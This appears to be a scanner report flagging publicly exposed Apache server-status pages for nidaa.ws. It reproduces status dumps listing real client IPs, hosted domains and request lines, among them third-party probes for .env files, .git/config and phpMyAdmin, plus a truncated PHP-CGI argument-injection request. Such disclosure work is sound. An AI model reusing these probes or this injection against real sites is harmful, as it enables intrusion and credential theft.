      5.51823409620.00.3625.37
      138.201.201.48http/1.1zed.sa:80POST /wp-cron.php?doing_wp_cron=1716474110.12027788162231445312
      
      1-0267870/36/357_
      5.5212730440.01.5848.68
      172.70.231.69http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-0267870/84/431_
      5.38345012304750.02.4620.29
      46.251.130.225http/1.1
      
      1-0267870/45/373_
      5.4915032814840.02.7717.55
      95.219.197.141http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1
      Found on 2024-05-23 14:23
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a8314081ce425e

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 23-May-2024 17:23:13 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  13 hours 18 minutes 24 seconds
      Server load: 0.48 0.39 0.41
      Total accesses: 89106 - Total Traffic: 9.9 GB - Total Duration: 49984538
      CPU Usage: u184.86 s29.49 cu208.54 cs39.23 - .965% CPU load
      1.86 requests/sec - 216.0 kB/second - 116.1 kB/request - 560.956 ms/request
      27 requests currently being processed, 0 workers gracefully restarting, 223 idle workers
      ___K__K____________K_______K__________K______________________K__
      KK___________K__________K________K__________________KKK_________
      _K________K__________K____K__K____K_____________________W__K____
      K_______K_______________K_____________K_________K_________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      <SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-0295290/513/513_
      46.9622022021310.053.2253.22
      176.224.99.150http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/shad_tile.png HTTP
      
      0-0295290/333/333_
      47.048211100310.058.6158.61
      220.126.251.164http/1.1akg.sa:443GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
      
      0-0295290/450/450_
      47.0275503255390.051.2751.27
      52.167.144.194http/1.1jawad.com.sa:443GET /en HTTP/1.1
      
      0-0295291/346/346K
      47.0602716830.820.3220.32
      172.70.114.254http/1.1nidaa.ws:80GET /.git/config HTTP/1.1
      
      0-0295290/370/370_
      46.9124813188600.047.4947.49
      204.101.161.19http/1.1zed.sa:80GET /wp-includes/js/mediaelement/mediaelement-migrate.min.js?ve
      
      0-0295290/315/315_
      46.9224313745120.027.1627.16
      204.101.161.19http/1.1zed.sa:80GET /wp-content/themes/gastrobar/assets/js/modules/plugins/jque
      
      0-0295291/482/482K
      47.062211942889.323.0723.07
      220.126.251.164http/1.1akg.sa:443GET /sqlmanager/index.php?lang=en HTTP/1.1
      
      0-0295290/315/315_
      46.8065648834240.040.4240.42
      220.126.251.164http/1.1
      
      0-0295290/477/477_
      47.00129792696320.055.3255.32
      172.70.203.130http/1.1qr.brunch.ws:443POST /foods/11 HTTP/1.1
      
      0-0295290/342/342_
      46.621391331715220.055.3055.30
      176.224.99.150http/1.1
      
      0-0295290/269/269_
      46.962237680764820.039.6639.66
      216.244.66.198http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A7%D9%84%D8%B9%D8%B4%D8%B1%D8%A9%20%D8%A
      
      0-0295290/465/465_
      47.050218390760.030.6030.60
      172.70.203.146http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-0295290/406/406_
      46.912581584170.031.3731.37
      207.102.138.19http/1.1zed.sa:80GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP
      
      0-0295290/377/377_
      47.02430921730.033.9033.90
      220.126.251.164http/1.1akg.sa:80GET /MyAdmin/index.php?lang=en HTTP/1.1
      
      0-0295290/472/472_
      46.95228682843910.042.8242.82
      172.70.203.152http/1.1qr.brunch.ws:443GET / HTTP/1.1
      
      0-0295290/299/299_
      47.0331201804930.021.7421.74
      220.126.251.164http/1.1akg.sa:443GET /phpMyAdmin-5.2.0-all-languages/index.php?lang=en HTTP/1.1
      
      0-0295290/365/365_
      46.9224112068880.048.3648.36
      204.101.161.19http/1.1zed.sa:80GET /wp-content/plugins/mpc-massive/assets/js/mpc-vendor.min.js
      
      0-0295290/395/395_
      46.9818112866640.059.2559.25
      2.90.128.26http/1.1albayan.edu.sa:443GET /web/images/title.jpg HTTP/1.1
      
      0-0295290/418/418_
      47.032229402650.054.3854.38
      220.126.251.164http/1.1akg.sa:443GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
      
      0-0295291/320/320K
      47.0611279710.815.5615.56
      172.70.111.108http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-0295290/370/370_
      46.9125612189890.038.4638.46
      204.101.161.19http/1.1zed.sa:80GET /wp-content/plugins/woocommerce/assets/js/frontend/woocomme
      
      0-0295290/358/358_
      46.991513927900.031.1231.12
      95.219.197.141http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-0295290/415/415_
      47.041429649410.024.8424.84
      220.126.251.164http/1.1akg.sa:443GET /mysql/web/index.php?lang=en HTTP/1.1
      
      0-0295290/382/382_
      46.9224521795410.031.0231.02
      204.101.161.19http/1.1zed.sa:80GET /wp-content/themes/gastrobar/assets/js/modules/plugins/Scro
      
      0-0295290/384/384_
      46.9619701198170.026.4126.41
      54.36.148.135http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=770&t=54.36.150.85&c=5 HTTP/1
      
      1-0267870/24/427_
      5.51135318091270.03.6990.54
      87.121.69.52http/1.1php.we3dvi.com:80CONNECT google.com:443 HTTP/1.1
      
      1-0267870/44/266_
      5.51486451176190.01.5968.05
      94.16.112.22http/1.1zed.sa:80POST /xmlrpc.php HTTP/1.1
      
      1-0267871/30/411K
      5.5313669056.72.0037.91
      220.126.251.164http/1.1akg.sa:443GET /index.php?lang=en HTTP/1.1
      
      1-0267870/39/409_
      5.4425214349090.04.6830.79
      204.101.161.19http/1.1zed.sa:80GET /wp-content/themes/gastrobar/assets/js/modules/plugins/jque
      
      1-0267870/19/399_
      5.51833409620.00.3625.37
      138.201.201.48http/1.1zed.sa:80POST /wp-cron.php?doing_wp_cron=1716474110.12027788162231445312
      
      1-0267870/36/357_
      5.5222730440.01.5848.68
      172.70.231.69http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-0267870/84/431_
      5.38355012304750.02.4620.29
      46.251.130.225http/1.1
      
      1-0267870/45/373_
      5.4915132814840.02.7717.55
      95.219.197.141http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      Found on 2024-05-23 14:23
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140a38b3727

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Thursday, 16-May-2024 00:57:17 +03
      Restart Time: Monday, 29-Apr-2024 20:36:44 +03
      Parent Server Config. Generation: 14
      Parent Server MPM Generation: 13
      Server uptime:  16 days 4 hours 20 minutes 33 seconds
      Server load: 0.36 0.27 0.21
      Total accesses: 2134832 - Total Traffic: 491.4 GB - Total Duration: 5327330051
      CPU Usage: u630.7 s26.72 cu9191.94 cs2738.04 - .9% CPU load
      1.53 requests/sec - 368.5 kB/second - 241.3 kB/request - 2495.43 ms/request
      71 requests currently being processed, 0 workers gracefully restarting, 79 idle workers
      _K_______________________KKK_KK_______K_K_KK_KKKKK..............
      ................................................................
      ......................KKKK___K_____KKKKKKKKW_K__KK_______K_K__KK
      KKW__KKKK_KK__K___KK__K_KKK___KKKK_K_KK_K___KK_KKKKKK__KKK......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-1341150/0/12341_
      0.0004274193290.00.002813.40
      195.191.219.131http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1220&t=144.76.120.197&c=5 HTT
      
      0-1341151/1/12302K
      0.0203194278230.90.002390.17
      162.158.62.91http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-1341150/0/12564_
      0.0000260345800.00.003172.84
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1285&t=148.251.69.139&c=5 HTT
      
      0-1341150/0/12372_
      0.00023239175120.00.003068.11
      195.191.219.130http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%AC%D8%AF%D9%88%D9%84%20%D8%A7%D8%AE%D8%A
      
      0-1341150/0/11893_
      0.00054215186680.00.002649.58
      4.242.218.139http/1.1daris.live:80GET /files HTTP/1.1
      
      0-1341150/0/11563_
      0.0001613487280.00.003312.44
      172.70.115.135http/1.1nidaa.ws:80GET /.well-known/pki-validation/807A888B253E7AF7A80C419531042AC
      
      0-1341150/0/11728_
      0.00016524278978030.00.002779.03
      142.247.104.109http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-1341150/0/11971_
      0.0000236109230.00.003245.18
      217.113.194.253http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=2&q=69&t=217.113.194.99&c=5 HTTP
      
      0-1341150/0/12153_
      0.000231152649380.00.002922.49
      195.191.219.130http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%AC%D8%AF%D9%88%D9%84%20%D8%A7%D8%AE%D8%A
      
      0-1341150/0/11910_
      0.00024923219347290.00.002569.33
      142.247.104.109http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-1341150/0/12275_
      0.0003115288193900.00.003245.40
      82.167.92.141http/1.1albayan.edu.sa:443GET /imgweb/cur1438/3/matst1.pdf HTTP/1.1
      
      0-1341150/0/12139_
      0.0000354766250.00.003389.99
      51.83.238.93http/1.13dvi.com:80GET /wp-content/themes/twentystd/ HTTP/1.1
      
      0-1341150/0/11623_
      0.0000239537860.00.002575.40
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1330&t=65.108.0.71&c=5 HTTP/1
      
      0-1341150/0/11940_
      0.0000252518190.00.002597.20
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1337&t=167.114.64.97&c=5 HTTP
      
      0-1341150/0/12254_
      0.0000268151570.00.002915.74
      172.70.251.81http/1.1nidaa.ws:80GET /.well-known/pki-validation/807A888B253E7AF7A80C419531042AC
      
      0-1341150/0/12083_
      0.000428216132000.00.002999.67
      192.30.83.56http/1.1sulaimaniya.edu.sa:443GET / HTTP/1.1
      
      0-1341150/0/11804_
      0.0000217896260.00.002492.98
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1337&t=195.191.219.131&c=5 HT
      
      0-1341150/0/12118_
      0.0003314459940.00.002891.96
      138.201.201.48http/1.1zed.sa:443POST /wp-cron.php?doing_wp_cron=1715810093.29975795745849609375
      
      0-1341150/0/11690_
      0.0009242255040.00.002988.46
      217.113.194.243http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=1903 HTTP/1.1
      
      0-1341150/0/11413_
      0.00025233701940.00.002812.87
      195.191.219.130http/1.1albayan.edu.sa:443GET /imgweb/file44/%D8%AA%D9%86%D8%B6%D8%A8%D8%A7%D8%B7%20%D8%A
      
      0-1341150/0/12034_
      0.0000213129150.00.002596.11
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1219&t=195.191.219.130&c=5 HT
      
      0-1341150/0/12235_
      0.0003245745600.00.002606.05
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1298&t=65.108.0.71&c=5 HTTP/1
      
      0-1341150/0/11860_
      0.0000327135340.00.003006.13
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1300&t=3.239.192.241&c=5 HTTP
      
      0-1341150/0/11504_
      0.00058228349180.00.003177.30
      4.242.218.139http/1.1daris.live:80GET /uploads HTTP/1.1
      
      0-1341150/0/12982_
      0.0000359144230.00.002894.29
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1337&t=194.247.173.99&c=5 HTT
      
      1-1336271/2/12589K
      0.3511275595770.90.132468.81
      172.70.242.6http/1.1nidaa.ws:80GET /_all_dbs HTTP/1.1
      
      1-13362726/26/12125K
      0.37142294532821.90.023009.38
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1251&t=45.77.142.238&c=5 HTTP
      
      1-1336271/3/11881K
      0.3711270582640.80.003062.14
      162.158.86.73http/1.1nidaa.ws:80GET /telescope/requests HTTP/1.1
      
      1-1336270/3/11403_
      0.27985965233820.00.012715.43
      139.59.132.8http/1.1albayan.akgsa.com:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-1336271/2/11547K
      0.3711276409910.80.182766.30
      172.69.150.189http/1.1nidaa.ws:80GET /.env HTTP/1.1
      
      1-1336271/3/12602K
      0.3801366247720.90.153107.12
      162.158.63.159http/1.1nidaa.ws:80<
      Found on 2024-05-15 21:57
  • Apache server-status page is publicly available
    IP: 188.114.96.9
    Domain: nidaa.ws
    Port: 443
    URL: https://nidaa.ws
    First seen 2024-03-28 06:00
    Last seen 2024-06-21 02:20
    Open for 84 days
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df77edbdfa9

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Friday, 21-Jun-2024 05:20:30 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  10 days 1 hour 17 minutes 25 seconds
      Server load: 0.00 0.02 0.05
      Total accesses: 856190 - Total Traffic: 95.0 GB - Total Duration: 1897312896
      CPU Usage: u501.36 s37.83 cu3731.42 cs771.49 - .58% CPU load
      .986 requests/sec - 114.6 kB/second - 116.3 kB/request - 2216 ms/request
      16 requests currently being processed, 0 workers gracefully restarting, 234 idle workers
      ___________W__________K__________K______________________________
      ___K_________K________________________C_______W_________________
      ___________________K__K______R____________K_____________________
      __K___________K____K_____________.....................W.........
      ..................._______W_______R_________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5154470/162/3913_
      9.686695304498640.01.52378.05
      172.69.195.176http/1.1qr.brunch.ws:443GET /storage/food_image/17162860567415_americancoffee.jpg HTTP/
      
      0-5154470/65/3469_
      9.7338517713885030.07.13349.54
      66.249.66.34http/1.1akg.sa:443GET /?TrCFVta/haddocker1196895/5AKvLDV HTTP/1.1
      
      0-5154470/49/3435_
      9.72511035632130.010.53459.71
      52.167.144.22http/1.1albayan.edu.sa:80GET /imgweb/1445/6th%20FIRST%20QB%20-%20Term%202%20-%20(2023-20
      
      0-5154470/118/3673_
      9.6767057257470.08.24284.13
      172.69.194.99http/1.1qr.brunch.ws:443GET /storage/food_image/17096777827045_tresh.webp HTTP/1.1
      
      0-5154470/117/3756_
      9.65172710542380.08.24382.15
      143.244.133.204http/1.1
      
      0-5154470/54/3474_
      9.761842013734540.01.02448.33
      5.180.24.166http/1.1new-filter.jawad.com.sa:80GET /administrator/.env HTTP/1.1
      
      0-5154470/105/3893_
      9.78111416924480.03.46316.54
      5.180.24.166http/1.1new-filter.jawad.com.sa:80GET /crm/.env HTTP/1.1
      
      0-5154470/69/3723_
      9.752005111564610.03.41309.06
      5.180.24.166http/1.1new-filter.jawad.com.sa:80GET /.env HTTP/1.1
      
      0-5154470/64/3501_
      9.7066959358530.05.82226.56
      172.69.43.228http/1.1qr.brunch.ws:443GET /storage/food_image/17162864494425_frenchlatteaulatte.jpg H
      
      0-5154470/66/3513_
      9.72602928339130.03.99641.70
      40.77.188.131http/1.1albayan.edu.sa:443GET /cPanel_magic_revision_1648610195/unprotected/cpanel/fonts/
      
      0-5154470/52/3630_
      9.73273310523690.00.85343.95
      66.249.66.70http/1.1hawsab.me:443GET /?hzw13672rlnidoz604.html HTTP/1.1
      
      0-5154470/79/3470W
      9.656215758350.023.11425.19
      95.186.22.103http/1.1jawad.com.sa:443GET /public/front_resources/css/bootstrap.min.css HTTP/1.1
      
      0-5154470/111/3562_
      9.781052093807250.03.61239.02
      5.180.24.166http/1.1new-filter.jawad.com.sa:80GET /storage/.env HTTP/1.1
      
      0-5154470/103/3842_
      9.79324611630100.03.86266.50
      66.249.66.82http/1.1albayan.edu.sa:443GET /web/27.html2 HTTP/1.1
      
      0-5154470/73/3817_
      9.49614424926200.02.20655.52
      41.92.35.224http/1.1
      
      0-5154470/71/3726_
      9.6966958447450.02.63341.48
      172.69.194.123http/1.1qr.brunch.ws:443GET /storage/food_image/17162863979577_flatwhite.jpg HTTP/1.1
      
      0-5154470/96/3640_
      9.75193214565980.016.91310.44
      5.180.24.166http/1.1new-filter.jawad.com.sa:80GET /core/Datavase/.env HTTP/1.1
      
      0-5154470/47/3551_
      9.67670311869200.04.56374.39
      172.69.195.18http/1.1qr.brunch.ws:443GET /storage/food_image/17096787262592_lemon.webp HTTP/1.1
      
      0-5154470/59/3356_
      9.74234146362670.05.66349.03
      139.59.34.99http/1.1jawad.com.sa:443GET /403.shtml HTTP/1.1
      
      0-5154470/59/2964_
      9.77116367619000.01.59359.20
      5.180.24.166http/1.1new-filter.jawad.com.sa:80GET /stag/.env HTTP/1.1
      
      0-5154470/94/3357_
      9.7518941848380930.05.08343.02
      5.180.24.166http/1.1new-filter.jawad.com.sa:80GET /psnlink/.env HTTP/1.1
      
      0-5154470/70/3633_
      9.77173219550310.010.23252.32
      5.180.24.166http/1.1new-filter.jawad.com.sa:80GET /site/.env HTTP/1.1
      
      0-5154471/122/3681K
      9.80025496890.84.35366.70
      172.68.193.191http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-5154470/96/3425_
      9.771791710299550.02.55470.33
      5.180.24.166http/1.1new-filter.jawad.com.sa:80GET /database/.env HTTP/1.1
      
      0-5154470/44/3772_
      9.68670415089500.03.06330.26
      172.69.194.31http/1.1qr.brunch.ws:443GET /storage/food_image/17096787428094_pinaple.webp HTTP/1.1
      
      1-57910/16/3568_
      3.0267051635765990.00.64451.19
      172.69.43.192http/1.1qr.brunch.ws:443GET /storage/food_image/17088550261100_img47415a6e0c4948078b83c
      
      1-57910/12/3125_
      3.01154101176320.052.93423.91
      143.244.133.204http/1.1
      
      1-57910/19/3505_
      3.1619621627264960.00.67284.66
      5.180.24.166http/1.1new-filter.jawad.com.sa:80GET /vendor/.env HTTP/1.1
      
      1-57910/13/3415_
      3.19103198074530.00.58196.22
      5.180.24.166http/1.1new-filter.jawad.com.sa:80GET /database/.env HTTP/1.1
      
      1-57910/14/3589_
      3.17186207985990.00.75261.35
      5.180.24.166http/1.1new-filter.jawad.com.sa:80GET /public/.env HTTP/1.1
      
      1-57910/25/3477_
      3.1918659807930.02.11395.72
      143.244.133.204http/1.1trynidaa.com:80GET / HTTP/1.1
      
      1-57910/15/3492_
      3.181143111764440.00.23858.99
      5.180.24.166http/1.1new-filter.jawad.com.sa:80GET /wp-admin/.env HTTP/1.1
      
      1-57910/65/3230_
      3.18107216120510.00.16292.91
      5.180.24.166http/1.1new-filter.jawad.com.sa:80
      Found on 2024-06-21 02:20
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7b9db6a18

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Friday, 21-Jun-2024 03:44:31 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  9 days 23 hours 41 minutes 26 seconds
      Server load: 0.11 0.06 0.06
      Total accesses: 852391 - Total Traffic: 94.7 GB - Total Duration: 1887264382
      CPU Usage: u484.31 s35.07 cu3731.42 cs771.49 - .582% CPU load
      .988 requests/sec - 115.1 kB/second - 116.5 kB/request - 2214.08 ms/request
      8 requests currently being processed, 0 workers gracefully restarting, 242 idle workers
      _______________K__________W_____________________________________
      _________________________________K____________________K_________
      _K_______________________________________K____________________K_
      ____________________________W____.....................W.........
      ..................._________________________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5154470/105/3856_
      8.2922837304496840.01.43377.95
      185.242.226.70http/1.13dvi.com:443GET / HTTP/1.1
      
      0-5154470/59/3463_
      8.2062927413879870.07.11349.52
      188.132.11.156http/1.1sibaq-alhuruf.thenewjeddah.com:GET /images/auth/auth-bg.png HTTP/1.1
      
      0-5154470/44/3430_
      8.16676335621390.010.38459.56
      60.188.57.0http/1.1akgsa.com:443GET / HTTP/1.1
      
      0-5154470/111/3666_
      8.28377957253670.07.47283.35
      193.26.115.73http/1.1wahjcm.com:443GET /wp-ver.php HTTP/1.1
      
      0-5154470/109/3748_
      8.091141010526420.07.15381.05
      45.159.229.175http/1.1albayan.edu.sa:80GET /wp-admin/css/ HTTP/1.1
      
      0-5154470/45/3465_
      8.26452013729850.00.87448.19
      157.245.102.17http/1.1albayan.edu.sa:80POST /hello.world?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect
      
      0-5154470/98/3886_
      8.09112206922430.03.38316.47
      66.249.66.1http/1.13dvi.com:80GET /raseed/privacypolicy.htm HTTP/1.1
      
      0-5154470/61/3715_
      8.2155912711536730.03.10308.76
      188.132.11.156http/1.1sibaq-alhuruf.thenewjeddah.com:GET /5bmFXNXdZV2RsWm05eWVtVmtDZz09 HTTP/1.1
      
      0-5154470/56/3493_
      8.149036859342500.04.63225.37
      91.92.245.111http/1.1zed.sa:443GET /wp-includes/widgets/include.php HTTP/1.1
      
      0-5154470/51/3498_
      8.15814428316410.03.84641.55
      66.249.66.40http/1.1hawsab.me:80GET /?nva20932.html HTTP/1.1
      
      0-5154470/46/3624_
      8.00599510520730.00.82343.93
      162.142.125.195http/1.1
      
      0-5154470/59/3450_
      8.11105022015751600.022.55424.63
      66.249.66.34http/1.1akg.sa:443GET /?cokernut/matchlessness1052413.html HTTP/1.1
      
      0-5154470/55/3506_
      8.29329193803360.02.94238.35
      54.36.148.221http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=2852 HTTP/1.1
      
      0-5154470/96/3835_
      8.101084311627150.03.34265.99
      168.149.95.231http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-5154470/63/3807_
      8.1394043024923060.02.12655.44
      216.244.66.198http/1.1albayan.edu.sa:443GET /imgweb/file42/%D8%A7%D9%84%D8%AA%D8%B9%D9%87%D8%AF%20%D8%A
      
      0-5154471/62/3717K
      8.32018446640.92.55341.40
      172.69.214.143http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-5154470/40/3584_
      8.2650712244561230.016.72310.24
      157.55.39.59http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/22_73672.pdf HTTP/1.1
      
      0-5154470/39/3543_
      8.0911496611852470.04.32374.16
      66.249.66.18http/1.13dvi.com:443GET /v/privacy.html HTTP/1.1
      
      0-5154470/52/3349_
      8.0151946362180.05.61348.99
      138.197.105.251http/1.1
      
      0-5154470/51/2956_
      8.0811693057604840.01.56359.16
      40.77.202.159http/1.1zed.sa:443GET /wp-content/themes/gastrobar/assets/css/font-awesome/fonts/
      
      0-5154470/87/3350_
      8.274493848379620.05.01342.95
